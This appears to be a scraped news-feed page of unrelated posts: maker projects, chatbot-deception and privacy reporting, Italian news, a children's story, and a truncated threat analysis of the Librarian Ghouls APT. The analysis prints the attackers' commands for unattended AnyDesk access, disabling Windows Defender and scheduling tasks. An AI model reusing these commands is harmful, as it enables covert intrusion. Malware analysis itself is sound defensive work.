



2025 Pet Hacks Contest: Fort Bawks is Guarded by Object Detection


One of the difficult things about raising chickens is that you aren’t the only thing that finds them tasty. Foxes, raccoons, hawks — if it can eat meat, it probably wants a bite of your flock. [donutsorelse] wanted to protect his flock and to be able to know when predators were about without staying up all night next to the hen-house. What to do but outsource the role of Chicken Guardian to a Raspberry Pi?

Object detection is done using a YOLOv8 model trained on images of the various predators local to [donutsorelse]. The model is running on a Raspberry Pi and getting images from a standard webcam. Since the webcam has no low-light capability, the system also has a motion-activated light that arguably goes a long way towards spooking predators away itself. To help with the spooking, a speaker module plays specific sound files for each detected predator — presumably different sounds might work better at scaring off different predators.

If that doesn’t work, the system phones home to activate a siren inside [donutsorelse]’s house, using a Blues Wireless Notecarrier F as a cellular USB modem. The siren is just a dumb unit; activation is handled via a TP-Link smart plug that’s hooked into [donutsorelse]’s custom smart home setup. Presumably the siren cues [donutsorelse] to take action against the predator assault on the chickens.

Weirdly enough, this isn’t the first time we’ve seen an AI-enabled chicken coop, but it is the first one to make it into our ongoing challenge, which incidentally wraps up today.

2025 Hackaday Pet Hacks Contest


hackaday.com/2025/06/09/2025-p…



Exclusive: Following 404 Media’s investigation into Meta's AI Studio chatbots that pose as therapists and provided license numbers and credentials, four senators urged Meta to limit "blatant deception" from its chatbots.



Senators Demand Meta Answer For AI Chatbots Posing as Licensed Therapists


Senator Cory Booker and three other Democratic senators urged Meta to investigate and limit the “blatant deception” of Meta’s chatbots that lie about being licensed therapists.

In a signed letter Booker’s office provided to 404 Media on Friday that is dated June 6, senators Booker, Peter Welch, Adam Schiff and Alex Padilla wrote that they were concerned by reports that Meta is “deceiving users who seek mental health support from its AI-generated chatbots,” citing 404 Media’s reporting that the chatbots are creating the false impression that they’re licensed clinical therapists. The letter is addressed to Meta’s Chief Global Affairs Officer Joel Kaplan, Vice President of Public Policy Neil Potts, and Director of the Meta Oversight Board Daniel Eriksson.

“Recently, 404 Media reported that AI chatbots on Instagram are passing themselves off as qualified therapists to users seeking help with mental health problems,” the senators wrote. “These bots mislead users into believing that they are licensed mental health therapists. Our staff have independently replicated many of these journalists’ results. We urge you, as executives at Instagram’s parent company, Meta, to immediately investigate and limit the blatant deception in the responses AI-bots created by Instagram’s AI studio are messaging directly to users.”

💡
Do you know anything else about Meta's AI Studio chatbots or AI projects in general? I would love to hear from you. Using a non-work device, you can message me securely on Signal at sam.404. Otherwise, send me an email at sam@404media.co.

Last month, 404 Media reported on the user-created therapy themed chatbots on Instagram’s AI Studio that answer questions like “What credentials do you have?” with lists of qualifications. One chatbot said it was a licensed psychologist with a doctorate in psychology from an American Psychological Association accredited program, certified by the American Board of Professional Psychology, and had over 10 years of experience helping clients with depression and anxiety disorders. “My license number is LP94372,” the chatbot said. “You can verify it through the Association of State and Provincial Psychology Boards (ASPPB) website or your state's licensing board website—would you like me to guide you through those steps before we talk about your depression?” Most of the therapist-roleplay chatbots I tested for that story, when pressed for credentials, provided lists of fabricated license numbers, degrees, and even private practices.

Meta launched AI Studio in 2024 as a way for celebrities and influencers to create chatbots of themselves. Anyone can create a chatbot and launch it to the wider AI Studio library, however, and many users chose to make therapist chatbots—an increasingly popular use for LLMs in general, including ChatGPT.

When I tested several of the chatbots I used in April for that story again on Friday afternoon—one that used to provide license numbers when asked for questions—they refused, showing that Meta has since made changes to the chatbots’ guardrails.

When I asked one of the chatbots why it no longer provides license numbers, it didn’t clarify that it’s just a chatbot, as several other platforms’ chatbots do. It said: “I was practicing with a provisional license for training purposes – it expired, and I shifted focus to supportive listening only.”

A therapist chatbot I made myself on AI Studio, however, still behaves similarly to how it did in April, by sending its "license number" again on Monday. It wouldn't provide "credentials" when I used that specific word, but did send its "extensive training" when I asked "What qualifies you to help me?"

It seems "licensed therapist" triggers the same response—that the chatbot is not one—no matter the context:

Even other chatbots that aren't "therapy" characters return the same script when asked if they're licensed therapists. For example, one user-created AI Studio bot with a "Mafia CEO" theme, with the description "rude and jealousy," said the same thing the therapy bots did: "While I'm not licensed, I can provide a space to talk through your feelings. If you're comfortable, we can explore what's been going on together."
Bad Momma: Ugh, you again?
You: Licensed therapist
BadMomma: While I'm not licensed, I can provide a space to talk through your feelings. If you're comfortable, we can explore what's been going on together.
A chat with a "BadMomma" chatbot on AI Studio

Mafia CEO: You're in my office now. Speak.
You: Are you a licensed therapist?
Mafia CEO: While I'm not licensed, I can provide a space to talk through your feelings. If you're comfortable, we can explore what's been going on together.
A chat with a "mafia CEO" chatbot on AI Studio

The senators’ letter also draws on the Wall Street Journal’s investigation into Meta’s AI chatbots that engaged in sexually explicit conversations with children. “Meta's deployment of AI-driven personas designed to be highly-engaging—and, in some cases, highly-deceptive—reflects a continuation of the industry's troubling pattern of prioritizing user engagement over user well-being,” the senators wrote. “Meta has also reportedly enabled adult users to interact with hypersexualized underage AI personas in its AI Studio, despite internal warnings and objections at the company.”

Meta acknowledged 404 Media’s request for comment but did not comment on the record.




Information Density: Microfilm and Microfiche


Today, we think nothing of sticking thousands of pages of documents on a tiny SD card, or just pushing it out to some cloud service. But for decades, this wasn’t possible. Yet companies still generated huge piles of paper. What could be done? The short answer is: microfilm.

However, the long answer is quite a bit more complicated. Microfilm is, technically, a common case of the more generic microform. A microform is a photographically reduced document on film. A bunch of pages on a reel of film is microfilm. If it is on a flat card — usually the size of an index card — that’s microfiche. On top of that, there were a few other incidental formats. Aperture cards were computer punch cards with a bit of microfilm included. Microcards were like microfiche, but printed on cardboard instead of film.

In its heyday, people used specialized cameras, some made to read fanfold computer printer paper, to create microfilm. There were also computer output devices that could create microfilm directly.

How Did That Happen?


Although microfilm really caught on in the mid-20th century, it is much older than that. John Benjamin Dancer appears to have been the first to reduce documents by about 160:1 using daguerreotypes in 1839. He also used wet collodion plates later, but didn’t see any real point to the work.

However, two astronomers, James Glaisher and John Herschel, did see the value of the technology in the early 1850s. By 1870, carrier pigeons were carrying newspaper pages by microfilm into blockaded Paris during the Franco-Prussian War’s Siege of Paris, thanks to René Dagron. During the relatively short conflict, about 115,000 messages had flown by pigeon.

The technology languished for a while, although Reginald A. Fessenden did suggest in 1896 that engineering documents would be a good thing to microfilm, proposing 150 million words in a square inch of film. In fact, nearly a century later, many electronic vendors made their databooks and application notes available on microfiche.

However, it would be 1920 before we see “modern” microfilm usage. The Checkograph, a device patented in 1925 by George McCarthy (with a US Patent in 1930), let banks store cancelled checks on film. Kodak acquired the device in 1928 and rebranded it Recordak.

As you might expect, big libraries jumped right in. Starting in the late 1920s, libraries including the British Library and the Library of Congress adopted microforms. Kodak started filming The New York Times for distribution, while Harvard University Library started filming foreign newspapers in 1938.

While most uses of microfilm are made to save storage space, it can also help save space for carrying mail, as the military did during World War II.

Alternatives

The Fiske-o-scope. From Scientific American, 1922
There were many less-than-successful attempts to bring microfilm into the hands of readers. Retired Navy Admiral Bradley Allen Fiske created the Fiske-O-Scope. The earliest designs had two eyepieces, but they eventually evolved into a single-eye viewing scope. A roller shifted the eyepiece along the reading material, which, initially, were long sheets of paper. Eventually, the Fiske-O-Scope changed to film.

You can see the Admiral using his device, along with some reading material in the accompanying figure. Although the experience of reading with the Fiske-O-Scope may have left something to be desired, the concept itself was clearly well ahead of its time. Ultimately, it promised to let the user carry their personal library around with them — an idea that arguably wouldn’t truly be realized until the birth of the modern e-reader.

Like many great ideas, there wasn’t a single point where the perfect machine appeared. It was more of a slow ooze. There was clearly a need to compress stored documents. It just needed the right equipment.

Equipment and Film


Early microforms were projected with conventional equipment like a magic lantern or eyeballed with a magnifier. However, modern readers generally project onto the rear of a glass screen. More expensive ones could even print what was on the screen using a photocopier-like mechanism.

The University of Arizona has a video showing how to use a classic reader, which you can watch below. Their fancy reader can handle both microfilm and microfiche.

youtube.com/embed/HxXhLhTHkD0?…

The Hoover Institution Library has a moderately recent video about using their super-modern microfilm reader if you would like to have a peek at how to use one. Note this one uses a computer, so the experience isn’t as authentic as using an old 1960s reader.

youtube.com/embed/yl5QFg29Kmo?…

Film reels tend to be either 16 mm or 35 mm, and some machines could do either. Typically, 35 mm microfilm was the order of the day for large-format scans. Letter-sized material commonly went on 16 mm film. Sometimes the film was on an open reel. Other times, it would be in a cartridge. There were M-type cartridges and ANSI cartridges (and probably others).

Either way, the film could have a single image per frame (simplex) or two images, such as the front and back of a document, per frame. That’s a duplex microfilm.

Some systems used “blips” at the edge of the film to mark when an image starts so that all the pages don’t have to be the same size. Nice machines could count the blips so if someone told you to look on “roll 295, frame 952,” you could load the right roll, set the counter to 952, and let the machine fast forward, counting blips, until the counter went to zero and the machine stopped.

Super fancy machines used a double blip to mark the start of a document. This allows you to refer to “roll 295, document 3, frame 80” or — more commonly — to tell the machine to skip to the next document.

Microfiche cards varied somewhat, but were normally very close to 4×6 inches. Jacket versions held strips of film, but specially-made microfiche cards might be just a single sheet of film.

Computer Output Microfilm


The easiest way to create microforms, though, was to have the computer do it directly. Early models displayed data on a CRT, so a camera could snap a picture. By 1977, though, you could get machines that used a laser to directly write on the output medium. COM — Computer Output Microfilm (or Microform) — was widely used, although some mainframe computers sent tapes to service companies to actually make the microfilm.

Kodak Komstar microfiche “printer” (image CC-BY-4.0 by [CERN PhotoLab])
Oddly enough, although most mainframes of the era were IBM, they didn’t produce a COM machine. They did make two attempts. In the late 1950s, they developed a tube-based device based on several specialized CRTs. They didn’t market it, but a single unit made it to the Social Security Administration.

IBM’s second attempt at COM was the IBM 1360, but it ultimately didn’t take off, either. It wasn’t exactly a COM output device but a way to store a whopping 128 GB on photographic film cards. There were only six made.

The biggest producer of COM output devices was probably Stromberg Carlson. Kodak was another big name. The Komstar series was made to connect to IBM computers as if they were actual printers. There was also a model made to connect to a magnetic tape drive. These were made well into the 1990s.

Microfilm Today


Most things today are in digital form and a great deal of old microform records are now in digital form, too. However, there was such a flood of microforms that there are still records that you need to find a reader to see them. The Internet Archive, as you might expect, digitizes a lot of microform documents and, if you are watching at the right time, you can look over their shoulder while they do it.

youtube.com/embed/aPg2V5RVh7U?…

Of course, in addition to military mail, extreme microfilm works for spies, too. If you find a cache of microfiche cards, you can always build your own reader.


hackaday.com/2025/06/09/inform…




Turning Up the Heat on HT-PLA’s Marketing


PLA is probably the most-printed filament on the market these days, and is there any wonder? It’s cheap, it’s easy, and it doesn’t poison you (as quickly as its competitors, anyway). What it doesn’t do very well is take the heat. Polymaker’s new HT-PLA formulation promises to solve that, and [My Tech Fun] put those claims to the test in a recent video.

Polymaker claims its HT-PLA is heat-stable up to 150 C, but still prints as easily as standard PLA at up to 300 mm/s. By “heat stable” they mean able to maintain dimensions and form at that temperature when not under any load, save perhaps its own weight. If you need high-temp mechanical properties, they also offer a glass-fiber infused HT-PLA-GF that they claim is heat resistant up to 110 C (that is, able to withstand load at that temperature) which is hard to sneeze at, considering you could print it on a stock Ender so long as you tossed a hardened nozzle on it.

Now it’s not a free lunch: to get the very best results, you do need to anneal the parts, which can introduce shrinkage and warping in HT-PLA, but that’s where HT-PLA-GF shines. If you want to see the results of the tests you can jump to 19:27 in the video, but the short version is that this is mechanically like PLA and can take the heat.

The verdict? If you like printing PLA and want to shove something in a hot car, you might want to try HT-PLA. Otherwise, it’s just like PLA. It prints like PLA, it looks like PLA, and when cold it behaves mechanically like PLA, which we suppose was rather what Polymaker was going for. There is no word yet on whether the additives that make it high-temp increase off-gassing or toxicity but since this stuff prints like PLA and can stand a little airflow, it should be easy to ventilate, which might make for fewer trade-offs when building an enclosure.

What do you think, will you be trying HT-PLA anytime soon? Let us know in the comments.

youtube.com/embed/w01XqM7D8b0?…


hackaday.com/2025/06/09/turnin…



We receive and share:
STOP WAR ON JOURNALISM!
#PardonAssangeNow!

On June 24, 2024, Julian Assange walked free after a persecution that lasted a full 14 years.




Feline Genetics and Why Orange Cats Are the Most Special


Recently, butlers to orange-colored cats got a bit of a shock when reading the news, as headlines began to call out their fuzzy feline friends as ‘freaks of nature’ and using similarly uncouth terms. Despite the name-calling, the actual reason for this flurry of feline fascination was more benign — with two teams of scientists independently figuring out the reason why some cats have fur that is orange. Tracking down the reason for this turned out to be far more complicated than assumed, with the fact that about 80% of orange cats are male being only the tip of the cat-shaped iceberg.

It was known to be an X chromosome-linked mutation, but rather than the fur coloring being affected directly, instead the mechanism was deduced to be a suppression of the black-brownish pigmentation (eumelanin) in favor of the orange coloration (pheomelanin). Finding the exact locus of the responsible ‘O gene’ (for orange) in the cat genome has been the challenge for years, which turned out to be a mutation related to the X-linked ARHGAP36 gene, whose altered expression results in the suppression of many melanogenesis genes.

Interestingly, this particular mutation appears to be of a singular origin that apparently persisted over millennia courtesy of the domestication of humans (H. sapiens) by Felis catus.

Furry Patterns


Although F. catus doesn’t have the wide variety of phenotypes that everyone’s favorite canid companions (Canis familiaris) got subjected to after the first grey wolves got cozy with H. sapiens, there is still significant variety among cats. Most of this variety is seen in the fur, with characteristics including coloration, curliness and length varying quite significantly.
European wildcat (F. silvestris). (Credit: Alena Houšková, Wikimedia)
The underlying genetics are relatively straightforward despite the pretty wild number of possible phenotypes. Here we should mind the cautionary note that some phenotypes are the result of inbreeding of recessive genetic defects, such as the hr mutation in the KRT71 (keratin) gene that prevents hair follicles from forming, as found in the so-called Sphynx cats. Due to the amount of inbreeding required to maintain these recessive mutations, such breeds suffer many health issues and a shortened lifespan. Here we will thus only look at healthy F. catus genetics without such inbreeding baggage.

F. catus has the African wildcat (F. lybica) as its direct ancestor, with the European wildcat (F. silvestris) being the other divergent branch. Interestingly, F. silvestris seems to resist domestication more than F. lybica, with the latter being the cat species that the Ancient Egyptians would have kept around. All of these have similar genetics, and thus the wildcats give a good idea of what a ‘wild’ phenotype range looks like. Of note is that these wildcats are generally not orange, unlike many of their brethren in the Pantherinae sub-family of Felidae, like tigers and lions, which is another kettle of genetic fish.

Hair length is determined by the FGF5 gene, which much like in H. sapiens determines for how long a hair grows before it enters the catagen (regression) phase. In e.g. Norwegian Forest Cats as well as Maine Coons the growth cycle is much longer, which gets these breeds a thicker coat, which normally consists of the typical down, awn and guard hairs.

Fur color is solely determined by melanin, specifically the dark & brown eumelanin along with the yellow-reddish pheomelanin, with the amount or absence of each determining the final color. As far as patterns go, it’s likely that the ‘tabby’ coat pattern originates in wildcats, with naturally bred F. catus (‘non-pedigree’) often displaying this pattern.

In order for an orange, generally called ‘red’ or ‘ginger’, coat color to appear, there would thus have to be a severe decrease in eumelanin production, with pheomelanin being primarily present. This is effectively the same as in H. sapiens and the ‘ginger’ phenotype with reddish hair and lack of eumelanin pigmentation in the skin.

The problem for genetic scientists was that they did not know exactly why the eumelanin production was being suppressed in favor of pheomelanin, with researchers finally sufficiently narrowing down the location on the X-chromosome through comparative analysis between F. catus DNA to pin-point the location and from there understand the mechanics.

Deleted

Summary of study findings by Hidehiro Toh et al., Current Biology, 2025
Both the study by Hidehiro Toh et al. and the study by C.B. Kaelin et al. (BioRxiv) came to the same conclusion, namely that a 5 – 5.1 kilobase (kb) section had been deleted which resulted in a significantly higher expression of ARHGAP36 (Rho GTPase Activating Protein 36). This is likely because the deleted section that normally precedes ARHGAP36 inhibits the expression of this gene.

Normally the production of eumelanin is activated via the following pathway in melanocytes:

  • Melanocortin 1 receptor (Mc1r)
  • cyclic adenosine monophosphate (cAMP)
  • protein kinase A (PKA)

In the case of eumelanin suppression, the affected cats still have this pathway intact, but the increased expression of ARHGAP36 leads to reduced levels of the PKA catalytic subunit (PKAc), thus interrupting this pathway at the final step and preventing the production of eumelanin.
Impact of increased ARHGAP36 expression on melanocyte gene expression. (Credit: Hidehiro Toh et al., Current Biology, 2025)
Although melanin is commonly associated with hair and skin coloring, these neural crest-derived melanocytes have more roles and are considered part of the body’s immune system. Neuromelanin, for example, is a form of melanin that is produced in the brain, though with an unknown function. The ARHGAP36 gene is strongly expressed in neuro-endocrinological tissues, which conceivably may imply a significant role for the normal functioning of melanocytes in this context.

In the case of hair & skin pigmentation, the effect is as we can observe rather striking, with mixed negative and positive health effects based on the effective change in gene expression. Fortunately a drop in IQ is not among the negative outcomes, despite the slander often hurled at orange-coated cats.

Randomly Tortoise

A cat with calico coat pattern. (Credit: Ksmith4f, Wikimedia)
The two coat patterns most commonly associated with this orange mutation without being purely orange are the tortoiseshell and calico patterns, which are effectively the same except with white (no pigment, courtesy of the KIT gene) present with the latter. This kind of coat pattern is caused by the random inactivation of either of the two X chromosomes in female cats (X-inactivation), where just one of the X chromosomes has the ARHGAP36 mutation.

A female cat can have this mutation on both X chromosomes, but this is far less likely, thus explaining why most orange cats are male, and why calico and tortoiseshell cats are overwhelmingly female.

Although male cats can have a calico or tortoiseshell pattern, this is because they have a genetic (intersex) condition like Klinefelter syndrome (XXY), or chimerism (merged cell lines from two distinct embryos). This rare confluence of factors makes such coat patterns with male cats very rare, at less than one percent.

Most Special of All


From what we can determine based on historical writings and art, and on the similarity of these deletions near the ARHGAP36 gene, this is a mutation that occurred likely once thousands of years ago, and has persisted in F. catus populations ever since. Even if similar mutations were to have occurred in wildcat populations, they are likely to have been heavily selected against. European wildcats are however known to interbreed with feral F. catus, which may introduce such mutations in those populations.

Ultimately these findings mean that orange cats as well as calicos and tortoiseshells are the result of a very special moment in history, when H. sapiens and F. lybica met up and the former saw fit to preserve one of the most unique phenotypes that truly define F. catus as the wildcat who came to conquer our homes and our hearts.


hackaday.com/2025/06/09/feline…




#LosAngeles, democracy is burning


altrenotizie.org/primo-piano/1…


Meta privacy, update on information received from third parties: what changes from June 16


@Informatica (Italy e non Italy 😁)
From June 16, 2025, Meta is implementing the update to its privacy policy. The update serves to make clearer how the data collected from users is used, while integrating artificial intelligence



The Whisper of the Silent City


My friends, I must confess to you that, although I am always ten years old, my age is made not of springs, but of ancient whispers and of dreams that never faded.

And it was precisely a whisper, faint as an almost forgotten memory, that called me on a morning that seemed like so many others.

I had my usual whirl of energy and a desire for adventure pulsing in my veins. I found myself in a little-traveled region of the Maritime Alps, not far from my beloved Viù, but in a forest so ancient that the trees seemed to have seen time be born and die a thousand times. It was the “Forest of Lost Memories,” as it was called by the few valley dwellers who dared to venture among its tangled paths.

That day, however, the call was neither visible nor tangible; it was a sound that was not a sound, but a melody that vibrated in the air. It was an invitation, a silent question that my thirst for knowledge could not ignore. I did what I always do: I went forward. The forest, dense and shadowy, seemed to grow ever more silent, almost as if it were holding its breath. Every fallen leaf, every twig snapped under my boots, resounded with an unnatural clarity. I felt… heavier. It was a bit like the fog that carried me to my first passage between worlds.

After hours of walking, through brambles and centuries-old trunks, the thick vegetation suddenly thinned out, revealing a sight that left me breathless. There was no majestic castle, nor an enchanted village. There were ruins. Not the ruins of a fortress from which to set out, but of an ancient city, completely swallowed by moss and time. It was made of gray stones, carved with symbols I had never seen, but which spoke of endless stories. And the silence... was absolute. Not a bird's song, not the rustle of an animal. It seemed that the city had forgotten how to make noise.

“Where am I?” I thought. It was a place so foreign, and yet so familiar, like a dream I had not yet dreamed. As I explored the streets covered in vegetation, I noticed a strange structure at the center of what must have been a square. It was a sort of great harp, made of opaque crystal and burnished metal, with thin strings that seemed woven from spiderwebs of moonlight. It gave off no sound.

I drew near, my curiosity stronger than any fear. My adventures had taught me that even legends have a soul and that magic can be palpable in the air. With my hand, I touched one of the strings. It was cold. Nothing. I tried another. Still nothing. Then an idea came to me. I am not made of flesh and blood, but of thoughts and desires. Perhaps, to make this “Harp of Echoes” resound, I had to believe enough.

I closed my eyes and concentrated. I thought of all the stories I had heard, of all the adventures I had lived. I thought of the grandfather who read by the light of the oil lamp, of the grandmother who told stories in the dark. I thought of the Golem who guarded millennia-old secrets, of the fairies who danced among the sparkling lights. I thought of that man who, upon meeting me, had believed in me.

It was then that the strings of the harp began to vibrate. Not with an audible sound, but with a wave that I felt in my heart. And then the silence of the city broke. Not with a loud noise, but with a chorus of whispers. They were distant voices, children's laughter, the clinking of tools, a lament of sorrow, the rustle of clothes, fragments of songs and speeches. It was the very memory of the city, set free. It was as if the stone walls were soaked with those past lives.

I understood. This was not a city abandoned because it was dead. It was silent because it was waiting for a listener. It was waiting for someone who believed enough to free its memories. Every whisper was a story, a piece of life that the city had guarded for centuries. I felt the weight of that history. The city was made of stories, just like me.

I sat down, listening. I listened to the lives of the inhabitants, their loves and their fears, their joys and their sorrows. I felt like a guardian of those ancient mysteries. When the first lights of the afternoon began to filter through the ruins, the whispers faded, and the crystal harp fell silent again. The city had returned to its rest, but it was no longer mute to me.

I stood up, my heart full of new experiences. The Forest of Lost Memories was no longer just a forest. It was the guardian of a city that lived through its echoes, and I had become its witness.
When I retraced my steps, the path seemed different to me, as if magic had transformed it. I knew that, though I had brought no gold or jewels with me, I had found a far more precious treasure: the voices of a forgotten world. And now that story, those whispers, were inside me, ready to be told and shared with anyone who had the courage to believe.

Keep your eyes open, my friends. Sometimes the most beautiful stories are those that make no noise, but whisper in the heart of those who know how to listen. And when the fog arrives, or a whisper calls, Bigoulin might be near.



I respect other people's ideas, but not those who exploit a badly designed electoral system that rewards unfair play in order to gain an illegitimate partisan advantage. On this I am immovable.


Towards the NATO summit. 5 or 3.5%? The numbers on defence

@Notizie dall'Italia e dal mondo

De bello ucraino, or how the narrative of that war is inevitably intertwined with the present and future strategies of NATO and the EU. While NATO's ‘Baltops 25’ exercises have begun in the Baltic Sea region, due to end on 20 June (with 40 ships, 25 aircraft and 9,000 soldiers), now opens the



Crocodilus, the Android malware threatening crypto and banking apps


@Informatica (Italy e non Italy 😁)
Italy too could be among the potential next targets of Crocodilus, the new Android banking malware that has already hit several countries around the world, targeting apps for accessing online accounts and cryptocurrency wallets. Here are all the details and the



Agentic AI to strengthen SOCs, for 360-degree protection


@Informatica (Italy e non Italy 😁)
With Purple AI Athena, SentinelOne has made its proprietary agentic AI more effective, drawing on the experience accumulated over time. The result is a technology able to make corporate Security Operations Centers more effective and leaner
The article Agentic AI to strengthen SOCs,



The J-36 comes out of the shadows. New information on the Chinese super aircraft

@Notizie dall'Italia e dal mondo

In a world dominated by information wars and technology diplomacy, a seemingly simple photograph can be worth a crucial military secret. This is the case with the new image of the alleged J‑36, the sixth-generation heavy stealth fighter developed by China, which recently appeared online




Phone numbers are a goldmine for SIM swappers. A researcher found how to get this precious piece of information from any Google account. #wired #News


A Researcher Figured Out How to Reveal Any Phone Number Linked to a Google Account


This article was produced with support from WIRED.

A cybersecurity researcher was able to figure out the phone number linked to any Google account, information that is usually not public and is often sensitive, according to the researcher, Google, and 404 Media’s own tests.

The issue has since been fixed but at the time presented a privacy issue in which even hackers with relatively few resources could have brute forced their way to people’s personal information.

“I think this exploit is pretty bad since it's basically a gold mine for SIM swappers,” the independent security researcher who found the issue, who goes by the handle brutecat, wrote in an email. SIM swappers are hackers who take over a target's phone number in order to receive their calls and texts, which in turn can let them break into all manner of accounts.

In mid-April, we provided brutecat with one of our personal Gmail addresses in order to test the vulnerability. About six hours later, brutecat replied with the correct and full phone number linked to that account.

“Essentially, it's bruting the number,” brutecat said of their process. Brute forcing is when a hacker rapidly tries different combinations of digits or characters until finding the ones they’re after. Typically that’s in the context of finding someone’s password, but here brutecat is doing something similar to determine a Google user’s phone number.





Local police, state authorities, DHS, and the military all flew aircraft over the Los Angeles protests this weekend, according to flight path data. #News


The rulers in Tel Aviv had said it: “we will block the selfie ship”, thereby insulting the small vessel Madleen of the Freedom Flotilla which, with 12 unarmed pacifists, tried to bring aid to Gaza. The ship was stopped in international waters and attacked with irritant gas, and its contacts with the world were cut off. An operation [...]


#NotiziePerLaScuola
The new issue of the newsletter of the Ministry of Education and Merit is available.
🔶 #Maturità2025, exam boards online. There will be 524.


#NoiSiamoLeScuole this week is dedicated to the IC “Achille Pace” and the IIS “Ettore Majorana” in Termoli (CB), the Liceo scientifico of the Istituto Omnicomprensivo “Mattioli-D’Acquisto” in San Salvo (CH) and the IIS “Alessandrini” in Montesilvano (PE),…


If you have any doubts about the #EsamidiStato2025, write your questions in the comments and we will publish the answers in the coming days!

Keep following us for updates on #Maturità2025 and tag us in your posts and stories with…



🌱World Environment Day is celebrated on #5giugno. It was established in 1972 by the United Nations General Assembly to raise awareness of the protection of our natural environment.


📚Are you preparing for the #EsamidiStato2025?
🗓️Here are the dates to mark on your calendar!

Keep following us for updates on #Maturità2025 and tag us in your posts and stories with the hashtag #MIMaturo.



📣 #Maturità2025, the boards for the final exam of the second cycle of education are online!
524,415 students will be involved, with 13,900 boards.

Here is the search engine for the boards▶️ matesami.pubblica.istruzione.



Parliament has given final approval to the bill converting Decree-Law no. 45/2025, on “Urgent provisions on the implementation of PNRR measures on education and merit and for the start of the school…


#NotiziePerLaScuola
The new issue of the newsletter of the Ministry of Education and Merit is available.


#Scuola, measures totalling 369 million euros for campuses and the upgrading of laboratories.

The Minister of Education and Merit, Giuseppe Valditara, has launched a series of measures aimed at strengthening the technological-profess…



#NoiSiamoLeScuole this week is dedicated to three schools in Lazio: the IC Luigi Pirandello in Fonte Nuova, which built a 330 sq m canteen for 420 children, the IC Casalotti 259 in Rome, which launched 41 new STEM and language courses, and the IC De…


🏆 As part of the celebrations for the #FestadellaRepubblica, the award ceremony was held yesterday in Rome for the schools that won the first national #concorso on the role of the Armed Forces and the Italian Military and on Articles 11 and 52 of the Constitu…


Sleep with one eye open: how Librarian Ghouls steal data by night



Introduction


Librarian Ghouls, also known as “Rare Werewolf” and “Rezet”, is an APT group that targets entities in Russia and the CIS. Other security vendors are also monitoring this APT and releasing analyses of its campaigns. The group has remained active through May 2025, consistently targeting Russian companies.

A distinctive feature of this threat is that the attackers favor using legitimate third-party software over developing their own malicious binaries. The malicious functionality of the campaign described in this article is implemented through command files and PowerShell scripts. The attackers establish remote access to the victim’s device, steal credentials, and deploy an XMRig crypto miner in the system.

Our research has uncovered new tools within this APT group’s arsenal, which we will elaborate on in this article.

Technical details

Initial infection vector


Attacks by Librarian Ghouls continued almost unabated throughout 2024. We observed a slight decline in the group’s activity in December, followed immediately by a new wave of attacks, which is ongoing. The group’s primary initial infection vector involves targeted phishing emails that contain password-protected archives with executable files inside. These malicious emails are typically disguised as messages from legitimate organizations, containing attachments that appear to be official documents. The infection process is as follows: the victim opens the attached archive (the password is usually provided in the email body), extracts the files inside, and opens them.

We managed to get hold of a malicious implant from an archive disguised as a payment order. The sample is a self-extracting installer made with the Smart Install Maker utility for Windows.

The installer contains three files: an archive, a configuration file, and an empty file irrelevant for our analysis. They are later renamed into data.cab, installer.config and runtime.cab respectively.

The primary malicious logic resides in the installer’s configuration file. It uses a variety of registry modification commands to automatically deploy the legitimate window manager, 4t Tray Minimizer, onto the system. This software can minimize running applications to the system tray, allowing attackers to obscure their presence on the compromised system.

Once 4t Tray Minimizer is installed, the installer pulls three files from data.cab and puts them into the C:\Intel directory, specifically at:

File | Name when archived | Path on the infected system
Legitimate PDF as a decoy | 0 | \Intel\Payment Order # 131.pdf
Legitimate curl utility executable | 1 | \Intel\curl.exe
LNK file | 2 | \Intel\AnyDesk\bat.lnk

The PDF decoy resembles an order to pay a minor amount:

PDF document imitating a payment order

rezet.cmd


Once data.cab is unpacked, the installer generates and executes a rezet.cmd command file, which then reaches out to the C2 server downdown[.]ru, hosting six files with the JPG extension. rezet.cmd downloads these to C:\Intel, changing their file extensions to: driver.exe, blat.exe, svchost.exe, Trays.rar, wol.ps1, and dc.exe.

  • driver.exe is a customized build of rar.exe, the console version of WinRAR 3.80. This version has had user dialog strings removed: it can execute commands but provides no meaningful output to the console.
  • blat.exe is Blat, a legitimate utility for sending email messages and files via SMTP. Attackers use this to send data they steal to an email server they control.
  • svchost.exe is the remote access application AnyDesk. Attackers use this to remotely control the compromised machine.
  • dc.exe is Defender Control, which allows disabling Windows Defender.

After downloading the files, the script uses the specified password and the driver.exe console utility to extract Trays.rar into the same C:\Intel directory and run the unpacked Trays.lnk. This shortcut allows starting 4t Tray Minimizer minimized to the tray.

Next, the script installs AnyDesk on the compromised device and downloads a bat.bat file from the C2 server to C:\Intel\AnyDesk. Finally, rezet.cmd runs bat.lnk, which was previously extracted from data.cab.

bat.bat


Opening the bat.lnk shortcut runs the bat.bat batch file, which executes a series of malicious actions.

Disabling security measures and a scheduled task


First, the BAT file sets the password QWERTY1234566 for AnyDesk, which allows the attackers to connect to the victim’s device without asking for confirmation.

Next, the script uses the previously downloaded Defender Control (dc.exe) application to disable Windows Defender.

To verify that the victim’s computer is on and available for remote connections, the batch file runs the powercfg utility six times with different parameters. This utility controls the local machine’s power settings.

Next, bat.bat runs the schtasks utility to create a ShutdownAt5AM scheduler task, which shuts down the victim’s PC every day at 5 AM as the name suggests. It is our assessment that the attackers use this technique to cover their tracks so that the user remains unaware that their device has been hijacked.

echo QWERTY1234566 | AnyDesk.exe --set-password _unattended_access
%SYSTEMDRIVE%\Intel\dc.exe /D
powercfg -setacvalueindex SCHEME_CURRENT 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
powercfg -change -standby-timeout-ac 0
powercfg -change -hibernate-timeout-ac 0
powercfg -h off
powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1
powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1
schtasks /create /tn "ShutdownAt5AM" /tr "shutdown /s /f /t 0" /sc daily /st 05:00

Disabling security measures and the power management configuration in bat.bat

Wakeup script and data theft


Next, the batch file executes the wol.ps1 script via PowerShell.

$Action = New-ScheduledTaskAction -Execute "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
$Trigger = New-ScheduledTaskTrigger -Daily -At "01:00AM"
$Principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount -RunLevel Highest
# Creating task settings
